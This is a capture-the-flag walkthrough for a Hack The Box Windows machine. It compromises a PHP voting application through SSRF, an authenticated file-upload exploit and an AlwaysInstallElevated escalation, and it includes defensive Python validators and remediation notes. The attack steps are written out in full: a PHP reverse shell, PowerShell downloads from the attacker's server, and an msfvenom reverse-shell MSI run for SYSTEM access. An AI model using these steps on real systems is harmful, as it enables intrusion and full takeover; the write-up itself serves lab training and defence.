HTB - Love

The given box Love is a Windows machine with an IP address of 10.10.10.239

Recon

Adding IP to /etc/hosts

┌──(aidenpearce369㉿aidenpearce369)-[~]
└─$ cat /etc/hosts | grep love
10.10.10.239    love.htb

Nmap Scan Result

On performing an nmap scan on the target, we can see there are 6 standard ports open

1. http - 80
2. msrpc - 135
3. netbios-ssn - 139
4. https/ssl - 443
5. smb - 445
6. mariaDB - 3306

Some service is also running on port 5000

nmap also reports that the machine is running Windows 7

┌──(aidenpearce369aidenpearce369)-[~]
└─$ sudo nmap -sC -sV -A love.htb  
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-15 12:17 IST
Nmap scan report for love.htb (10.10.10.239)
Host is up (0.27s latency).
Not shown: 993 closed ports
PORT     STATE SERVICE      VERSION
80/tcp   open  http         Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
443/tcp  open  ssl/ssl      Apache httpd (SSL-only mode)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after:  2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
445/tcp  open  microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open  mysql?
| fingerprint-strings: 
|   SIPOptions: 
|_    Host '10.10.14.8' is not allowed to connect to this MariaDB server
5000/tcp open  http         Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3306-TCP:V=7.91%I=7%D=9/15%Time=61419732%P=x86_64-pc-linux-gnu%r(SI
SF:POptions,49,"E\0\0\x01\xffj\x04Host\x20'10\.10\.14\.8'\x20is\x20not\x20
SF:allowed\x20to\x20connect\x20to\x20this\x20MariaDB\x20server");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=9/15%OT=80%CT=1%CU=30811%PV=Y%DS=2%DC=T%G=Y%TM=6141975
OS:3%P=x86_64-pc-linux-gnu)SEQ(SP=109%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%TS=
OS:U)OPS(O1=M54DNW8NNS%O2=M54DNW8NNS%O3=M54DNW8%O4=M54DNW8NNS%O5=M54DNW8NNS
OS:%O6=M54DNNS)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FF70)ECN(R=Y%
OS:DF=Y%T=80%W=FFFF%O=M54DNW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=
OS:0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S
OS:=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=
OS:Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=
OS:R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T
OS:=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=
OS:Z)

Network Distance: 2 hops
Service Info: Hosts: LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 27m50s, deviation: 0s, median: 27m50s
| smb-security-mode: 
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-09-15T07:16:29
|_  start_date: N/A

TRACEROUTE (using port 22/tcp)
HOP RTT       ADDRESS
1   267.10 ms 10.10.14.1
2   267.36 ms love.htb (10.10.10.239)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 62.89 seconds

Looking through the scan result, the SSL certificate on port 443 reveals a subdomain

443/tcp  open  ssl/ssl      Apache httpd (SSL-only mode)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
| ssl-cert: Subject: commonName=staging.love.htb/

The SSL cert is issued for staging.love.htb, so let's add this to /etc/hosts so that we can access that webapp

┌──(aidenpearce369aidenpearce369)-[~]
└─$ cat /etc/hosts | grep love   
10.10.10.239    love.htb staging.love.htb

Enumeration

Enumerating SMB with smbmap

┌──(aidenpearce369aidenpearce369)-[~]
└─$ smbmap -H 10.10.10.239 -u moni
[!] Authentication error on 10.10.10.239

We can't enumerate SMB shares with guest or fake creds, because the server requires proper authentication

Enumerating SMB with smbclient

┌──(aidenpearce369aidenpearce369)-[~]
└─$ smbclient -N -L //10.10.10.239
session setup failed: NT_STATUS_ACCESS_DENIED

No luck in SMB enumeration

Enumerating MariaDB

MariaDB is a fork of MySQL and uses the same client commands and configuration

┌──(aidenpearce369aidenpearce369)-[~]
└─$ mysql -h 10.10.10.239
ERROR 1130 (HY000): Host '10.10.14.8' is not allowed to connect to this MariaDB server

Could not connect to MariaDB server

Directory bruteforcing using gobuster

We do not have adequate information about the webapp yet, so we need to find more paths and directories to understand its functionality

Directory bruteforcing is a way to find more hidden details about a webapp

┌──(aidenpearce369aidenpearce369)-[~]
└─$ gobuster dir -u love.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://love.htb
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2021/09/15 12:24:20 Starting gobuster in directory enumeration mode
===============================================================
/images               (Status: 301) [Size: 330] [--> http://love.htb/images/]
/Images               (Status: 301) [Size: 330] [--> http://love.htb/Images/]
/admin                (Status: 301) [Size: 329] [--> http://love.htb/admin/] 
/plugins              (Status: 301) [Size: 331] [--> http://love.htb/plugins/]
/includes             (Status: 301) [Size: 332] [--> http://love.htb/includes/]
/examples             (Status: 503) [Size: 398]                                
/dist                 (Status: 301) [Size: 328] [--> http://love.htb/dist/]    
/licenses             (Status: 403) [Size: 417]                                
/IMAGES               (Status: 301) [Size: 330] [--> http://love.htb/IMAGES/]  
/%20                  (Status: 403) [Size: 298]                                
/Admin                (Status: 301) [Size: 329] [--> http://love.htb/Admin/]   
/*checkout*           (Status: 403) [Size: 298]                                
/Plugins              (Status: 301) [Size: 331] [--> http://love.htb/Plugins/] 
/phpmyadmin           (Status: 403) [Size: 298]                                
/webalizer            (Status: 403) [Size: 298]                                
/*docroot*            (Status: 403) [Size: 298]                                
/*                    (Status: 403) [Size: 298]                                
/con                  (Status: 403) [Size: 298]                                
/http%3A              (Status: 403) [Size: 298]                                
/Includes             (Status: 301) [Size: 332] [--> http://love.htb/Includes/]
/**http%3a            (Status: 403) [Size: 298]                                
/*http%3A             (Status: 403) [Size: 298]                                
Progress: 46492 / 220561 (21.08%)

There is an interesting directory /admin, which may lead to higher access

Enumerating web application

When we visit the webapp at love.htb or its resolved IP 10.10.10.239, we get a login form titled Voting System

Since we found a DB on port 3306, I tried SQL injection on the login form

No luck in SQL injection

We also found that this webapp has a subdomain named staging.love.htb

Let's check that,

It seems to be a file upload webapp

After browsing around, we can reach this upload page

We can enter a URL in the input field, and the application scans it and displays the output

What if we tried an SSRF?

SSRF - Server Side Request Forgery is a web security vulnerability that allows an attacker to induce the server-side application to make HTTP requests to an arbitrary domain of the attacker’s choosing

For more on SSRF

We know that there is an unknown service running on port 5000

Let's try to get that service's data through SSRF by passing http://127.0.0.1:5000/ in the input field

The server makes the request and retrieves the response from its own side, so we can see the data served on port 5000
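The server-side fix for this is to validate the URL before the application fetches it. The following Python is an added example, not code from the Voting System application or from this writeup: it checks the scheme, the userinfo, every address the hostname resolves to, and the port, and rejects loopback, private and link-local destinations such as http://127.0.0.1:5000/. The `resolver` parameter, the function name and the host names used in the test are my own constructions.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Policy for the "scan this URL" feature: web schemes and web ports only.
ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def _default_resolver(host):
    """Return every address (A and AAAA) the host name maps to."""
    infos = socket.getaddrinfo(host, None)
    return sorted({info[4][0] for info in infos})


def _is_public(addr):
    """True only for globally routable addresses; IPv4-mapped IPv6 is unwrapped
    so ::ffff:127.0.0.1 cannot slip past the loopback check."""
    ip = ipaddress.ip_address(addr)
    if ip.version == 6 and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip.is_global


def check_fetch_target(url, resolver=_default_resolver):
    """Return (allowed, reason) for a user-supplied URL.

    `resolver` must return a list of address strings or raise OSError;
    it is a parameter so the check can be exercised without DNS.
    """
    try:
        parts = urlsplit(url)
    except ValueError as exc:
        return False, f"unparseable URL: {exc}"
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, f"scheme {scheme!r} not allowed"
    if parts.username or parts.password:
        return False, "credentials in URL not allowed"
    host = parts.hostname
    if not host:
        return False, "missing host"
    # IP literals are checked directly; names are resolved and every
    # returned address must be public (a name may map to several).
    try:
        addrs = [str(ipaddress.ip_address(host))]
    except ValueError:
        try:
            addrs = resolver(host)
        except OSError as exc:
            return False, f"cannot resolve {host!r}: {exc}"
    for addr in addrs:
        if not _is_public(addr):
            return False, f"{host!r} resolves to non-public address {addr}"
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, f"port {port} not allowed"
    return True, "ok (" + ", ".join(addrs) + ")"
```

Two design notes: the resolver check alone is a point-in-time answer, so a fetcher that re-resolves the name later is exposed to DNS rebinding; the safe pattern is to connect to the address that was validated. Redirects are a second path to the same problem, so each hop of a redirect chain must be run through the same check.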

We get the creds of the admin user

Let's use them to log in at /admin

After logging in to /admin, we can see a Voting System framework

Finding suitable exploits through searchsploit

After googling Voting System, it turns out to be an application named Voting System 1.0 with a lot of known bugs in it

Using searchsploit to find a suitable exploit,

┌──(aidenpearce369aidenpearce369)-[~]
└─$ searchsploit voting system
--------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                 |  Path
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Online Voting System - Authentication Bypass                                                                   | php/webapps/43967.py
Online Voting System 1.0 - Authentication Bypass (SQLi)                                                        | php/webapps/50075.txt
Online Voting System 1.0 - Remote Code Execution (Authenticated)                                               | php/webapps/50076.txt
Online Voting System 1.0 - SQLi (Authentication Bypass) + Remote Code Execution (RCE)                          | php/webapps/50088.py
Online Voting System Project in PHP - 'username' Persistent Cross-Site Scripting                               | multiple/webapps/49159.txt
Voting System 1.0 - Authentication Bypass (SQLI)                                                               | php/webapps/49843.txt
Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)                                      | php/webapps/49445.py
Voting System 1.0 - Remote Code Execution (Unauthenticated)                                                    | php/webapps/49846.txt
Voting System 1.0 - Time based SQLI (Unauthenticated SQL injection)                                            | php/webapps/49817.txt
WordPress Plugin Poll_ Survey_ Questionnaire and Voting system 1.5.2 - 'date_answers' Blind SQL Injection      | php/webapps/50052.txt
--------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results

We are logged in to /admin and we have the admin creds

So let's try the authenticated RCE with

Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)                                      | php/webapps/49445.py

Gaining Access

Automated Exploit

Copying the exploit to working directory

┌──(aidenpearce369aidenpearce369)-[~/HTB/Love]
└─$ searchsploit -m php/webapps/49445.py
  Exploit: Voting System 1.0 - File Upload RCE (Authenticated Remote Code Execution)
      URL: https://www.exploit-db.com/exploits/49445
     Path: /usr/share/exploitdb/exploits/php/webapps/49445.py
File Type: Python script, ASCII text executable, with very long lines

Copied to: /home/aidenpearce369/HTB/Love/49445.py

Editing the configurations in the exploit code,

Before editing

# --- Edit your settings here ----
IP = "192.168.1.207" # Website's URL
USERNAME = "potter" #Auth username
PASSWORD = "password" # Auth Password
REV_IP = "192.168.1.207" # Reverse shell IP
REV_PORT = "8888" # Reverse port
# --------------------------------

INDEX_PAGE = f"http://{IP}/votesystem/admin/index.php"
LOGIN_URL = f"http://{IP}/votesystem/admin/login.php"
VOTE_URL = f"http://{IP}/votesystem/admin/voters_add.php"
CALL_SHELL = f"http://{IP}/votesystem/images/shell.php"

After editing

# --- Edit your settings here ----
IP = "10.10.10.239" # Website's URL
USERNAME = "admin" #Auth username
PASSWORD = "@LoveIsInTheAir!!!!" # Auth Password
REV_IP = "10.10.14.8" # Reverse shell IP
REV_PORT = "8989" # Reverse port
# --------------------------------

INDEX_PAGE = f"http://{IP}/admin/index.php"
LOGIN_URL = f"http://{IP}/admin/login.php"
VOTE_URL = f"http://{IP}/admin/voters_add.php"
CALL_SHELL = f"http://{IP}/images/shell.php"

After modifying this code, let's run our exploit along with a netcat listener

┌──(aidenpearce369aidenpearce369)-[~/HTB/Love]
└─$ python3 49445.py
Start a NC listner on the port you choose above and run...
Logged in
Poc sent successfully

┌──(aidenpearce369aidenpearce369)-[~/HTB/Love]
└─$ nc -nlvp 8989   
listening on [any] 8989 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.239] 53453
b374k shell : connected

Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\omrs\images>whoami
whoami
love\phoebe

...

C:\Users\Phoebe\Desktop>more user.txt
more user.txt
<---USER FLAG--->

C:\Users\Phoebe\Desktop>

So we have a shell with love\phoebe privileges

Manual exploit

We can see a file upload here,

Since the webapp runs on PHP, let's put a PHP reverse shell in the file upload

The PHP reverse shell I always use

Editing the reverse shell,

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.14.8';  // CHANGE THIS
$port = 5454;       // CHANGE THIS
$chunk_size = 1400;
$write_a = null;
$error_a = null;
$shell = 'whoami';
$daemon = 0;
$debug = 0;

It is a Windows machine, so don't use Linux commands in the $shell setting

After uploading the reverse shell in the image section

Check the uploaded PHP file after reloading the page

Note that the image has been overridden by our PHP reverse shell

After inspecting it and opening our PHP reverse shell,

our netcat listener receives the reverse shell

┌──(aidenpearce369aidenpearce369)-[~]
└─$ nc -nlvp 5454
listening on [any] 5454 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.239] 53464
love\phoebe
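The manual route works because the image upload trusts the client's file name and content. The following Python is an added example, not code from Voting System or from this writeup; it shows the checks a hardened upload handler would apply: allowlist the final extension, verify the magic bytes match that type, refuse files carrying PHP tags (the image/PHP polyglot case), and store the file under a server-generated name so an upload can neither be called shell.php nor overwrite an existing image. The function name, the size limit and the sample files are my own constructions.

```python
import os
import secrets

# Magic bytes of the image types the upload form is meant to accept.
IMAGE_SIGNATURES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
# Anything that would let the stored file be parsed as PHP is refused,
# even when the magic bytes are valid (EXIF/comment polyglots).
PHP_MARKERS = (b"<?php", b"<?=", b"<script language")
MAX_BYTES = 2 * 1024 * 1024  # assumed limit for this example


def validate_image_upload(filename, data):
    """Return (accepted, detail).

    On success `detail` is the server-chosen name to store the file under;
    on failure it is the reason for rejection.
    """
    if len(data) > MAX_BYTES:
        return False, "file too large"
    # Strip any directory component the client sent (Windows or POSIX).
    base = os.path.basename(filename.replace("\\", "/"))
    # Only the final extension counts, so shell.php.png is judged as png
    # and must then also carry real PNG bytes.
    _, ext = os.path.splitext(base)
    ext = ext.lower().lstrip(".")
    if ext not in IMAGE_SIGNATURES:
        return False, f"extension {ext!r} not allowed"
    if not data.startswith(IMAGE_SIGNATURES[ext]):
        return False, f"content does not match a {ext} image"
    lowered = data.lower()
    if any(marker in lowered for marker in PHP_MARKERS):
        return False, "embedded PHP code detected"
    # Discard the client's name entirely; the random name also prevents
    # overwriting an existing image, as happened on this box.
    return True, f"{secrets.token_hex(16)}.{ext}"
```

Defence in depth on the web server side is to keep script execution disabled in the upload directory (for Apache with mod_php, `php_admin_flag engine off` in that directory's configuration), so that even a file that passes these checks is only ever served as static content.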

Privilege Escalation

We only have user level access on the machine

To get Administrator or NT AUTHORITY\SYSTEM level access, we need to escalate our privileges

Enumerating privilege escalation weaknesses manually takes a lot of time

Let's use winPEAS to enumerate all possible privilege escalation weaknesses

Clone this repo for winPEAS

┌──(aidenpearce369aidenpearce369)-[~//winPEAS/winPEASexe/binaries/Release]
└─$ ls
winPEASany.exe
                                                                                                                                                 
┌──(aidenpearce369aidenpearce369)-[~//winPEAS/winPEASexe/binaries/Release]
└─$ python3 -m http.server 4545           
Serving HTTP on 0.0.0.0 port 4545 (http://0.0.0.0:4545/) ...
C:\Users\Phoebe>powershell wget http://10.10.14.8:4545/winPEASany.exe -outfile privesc.exe
powershell wget http://10.10.14.8:4545/winPEASany.exe -outfile privesc.exe

C:\Users\Phoebe>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of C:\Users\Phoebe

09/15/2021  02:00 AM    <DIR>          .
09/15/2021  02:00 AM    <DIR>          ..
04/12/2021  03:50 PM    <DIR>          3D Objects
04/12/2021  03:50 PM    <DIR>          Contacts
04/13/2021  03:20 AM    <DIR>          Desktop
04/12/2021  03:50 PM    <DIR>          Documents
04/13/2021  09:55 AM    <DIR>          Downloads
04/12/2021  03:50 PM    <DIR>          Favorites
04/12/2021  03:50 PM    <DIR>          Links
04/12/2021  03:50 PM    <DIR>          Music
04/12/2021  03:52 PM    <DIR>          OneDrive
04/21/2021  07:01 AM    <DIR>          Pictures
09/15/2021  02:00 AM         1,924,608 privesc.exe
04/12/2021  03:50 PM    <DIR>          Saved Games
04/12/2021  03:51 PM    <DIR>          Searches
04/23/2021  03:39 AM    <DIR>          Videos
               1 File(s)      1,924,608 bytes
              15 Dir(s)   4,054,089,728 bytes free

C:\Users\Phoebe>

Let's run winPEAS to find all possible weaknesses; it displays a lot of information, and reading it properly takes some study


...

╔══════════╣ Checking AlwaysInstallElevated
  https://book.hacktricks.xyz/windows/windows-local-privilege-escalation#alwaysinstallelevated
    AlwaysInstallElevated set to 1 in HKLM!
    AlwaysInstallElevated set to 1 in HKCU!

...

Here it shows that AlwaysInstallElevated is enabled, which can be confirmed by querying both registry values

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated

If both of these registry values are set to 1, Windows Installer runs any .msi package we install as NT AUTHORITY\SYSTEM
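winPEAS flags the setting, but confirming it means reading both values, since Windows Installer only honours the policy when the HKLM and HKCU values are both 1. The following Python is an added example rather than anything from winPEAS or this writeup: it parses the output of the two reg query commands above and reports whether the condition holds. The output format is assumed from the commands shown on the page, and the sample output strings are constructed, not captured from the box.

```python
import re

# One value line as printed by `reg query <key> /v AlwaysInstallElevated`:
#     AlwaysInstallElevated    REG_DWORD    0x1
VALUE_RE = re.compile(
    r"^\s*AlwaysInstallElevated\s+REG_DWORD\s+(0x[0-9a-fA-F]+|\d+)\s*$",
    re.MULTILINE,
)


def parse_always_install_elevated(reg_query_output):
    """Return the DWORD from reg query output, or None when the value or
    key is absent (reg prints an ERROR line instead of a value line)."""
    match = VALUE_RE.search(reg_query_output)
    if not match:
        return None
    return int(match.group(1), 0)  # base 0 accepts both "0x1" and "1"


def always_install_elevated_enabled(hklm_output, hkcu_output):
    """The policy is only effective when BOTH hives carry the value 1."""
    return (parse_always_install_elevated(hklm_output) == 1
            and parse_always_install_elevated(hkcu_output) == 1)


def audit(hklm_output, hkcu_output):
    """Summarise the finding the way a host audit would report it."""
    hklm = parse_always_install_elevated(hklm_output)
    hkcu = parse_always_install_elevated(hkcu_output)
    return {
        "hklm": hklm,
        "hkcu": hkcu,
        "vulnerable": always_install_elevated_enabled(hklm_output, hkcu_output),
    }


# Constructed sample output (not captured from the box).
HKLM_ENABLED = """
HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
HKCU_ENABLED = """
HKEY_CURRENT_USER\\SOFTWARE\\Policies\\Microsoft\\Windows\\Installer
    AlwaysInstallElevated    REG_DWORD    0x1
"""
HKCU_MISSING = (
    "ERROR: The system was unable to find the specified registry key or value.\n"
)

if __name__ == "__main__":
    print(audit(HKLM_ENABLED, HKCU_ENABLED))
    print(audit(HKLM_ENABLED, HKCU_MISSING))
```

Remediation is to set both values to 0 (reg add with /t REG_DWORD /d 0 /f on each key) or, better, to leave the "Always install with elevated privileges" policy disabled in both the Computer and User Configuration branches of Group Policy under Administrative Templates > Windows Components > Windows Installer, so the setting cannot drift back.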

Let's generate a malicious .msi executable through msfvenom,

┌──(aidenpearce369aidenpearce369)-[~]
└─$ msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.8 LPORT=6767 -f msi -o backdoor.msi
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
No encoder specified, outputting raw payload
Payload size: 460 bytes
Final size of msi file: 159744 bytes
Saved as: backdoor.msi

When we execute this backdoor.msi, it spawns a reverse shell with NT AUTHORITY\SYSTEM privileges

C:\Users\Phoebe>powershell wget http://10.10.14.8:4545/backdoor.msi -outfile a.msi
powershell wget http://10.10.14.8:4545/backdoor.msi -outfile a.msi

C:\Users\Phoebe>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 56DE-BA30

 Directory of C:\Users\Phoebe

09/15/2021  02:10 AM    <DIR>          .
09/15/2021  02:10 AM    <DIR>          ..
04/12/2021  03:50 PM    <DIR>          3D Objects
09/15/2021  02:10 AM           159,744 a.msi
04/12/2021  03:50 PM    <DIR>          Contacts
04/13/2021  03:20 AM    <DIR>          Desktop
04/12/2021  03:50 PM    <DIR>          Documents
04/13/2021  09:55 AM    <DIR>          Downloads
04/12/2021  03:50 PM    <DIR>          Favorites
04/12/2021  03:50 PM    <DIR>          Links
04/12/2021  03:50 PM    <DIR>          Music
04/12/2021  03:52 PM    <DIR>          OneDrive
04/21/2021  07:01 AM    <DIR>          Pictures
09/15/2021  02:00 AM         1,924,608 privesc.exe
04/12/2021  03:50 PM    <DIR>          Saved Games
04/12/2021  03:51 PM    <DIR>          Searches
04/23/2021  03:39 AM    <DIR>          Videos
               2 File(s)      2,084,352 bytes
              15 Dir(s)   4,014,354,432 bytes free

C:\Users\Phoebe>msiexec /quiet /qn /i a.msi      
msiexec /quiet /qn /i a.msi

On our netcat listener,

┌──(aidenpearce369aidenpearce369)-[~]
└─$ nc -nlvp 6767
listening on [any] 6767 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.239] 53474
Microsoft Windows [Version 10.0.19042.867]
(c) 2020 Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
whoami
nt authority\system

C:\Users\Phoebe\Desktop>more user.txt
more user.txt
<---USER FLAG--->

C:\Users\Administrator\Desktop>more root.txt
more root.txt
<---ROOT FLAG--->